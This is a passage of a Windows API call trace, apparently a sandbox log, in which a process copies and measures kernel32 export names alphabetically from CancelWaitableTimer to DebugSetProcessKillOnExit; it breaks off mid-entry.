[0087.894] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.894] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.894] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.894] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.894] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.894] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.894] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.894] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.894] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.894] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.894] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.894] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.894] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.894] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.894] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.894] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.895] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.895] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.895] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.895] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.895] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.895] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.895] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.895] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.895] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.895] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.895] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.895] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.895] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.895] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.895] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.895] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.895] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.895] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.895] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.895] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.896] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.896] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.896] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.896] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.896] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.896] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.896] lstrlenA (lpString="COPYFILEA") returned 9 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.896] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.896] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.896] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.896] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.896] lstrlenA (lpString="COPYFILEW") returned 9 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.896] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.896] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.896] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.896] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.896] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.896] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.896] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.897] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.897] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.897] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.897] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.897] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.897] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.897] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.897] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.897] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.897] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.897] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.897] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.897] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.897] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.897] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.897] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.897] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.897] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.897] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.898] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.898] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.898] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.898] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.898] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.898] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.898] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.898] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.898] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.898] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.898] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.898] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.898] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.898] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.898] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.898] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.898] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.898] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.898] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.898] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.899] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.899] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.899] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.899] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.899] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.899] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.899] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.899] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.899] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.899] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.899] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.899] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.899] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.899] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.899] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.899] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.899] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.899] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.899] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.900] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.900] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.900] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.900] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.900] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.900] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.900] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.900] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.900] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.900] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.900] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.900] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.900] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.900] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.900] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.900] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.900] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.900] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.900] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.901] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.901] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.901] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.901] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.901] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: 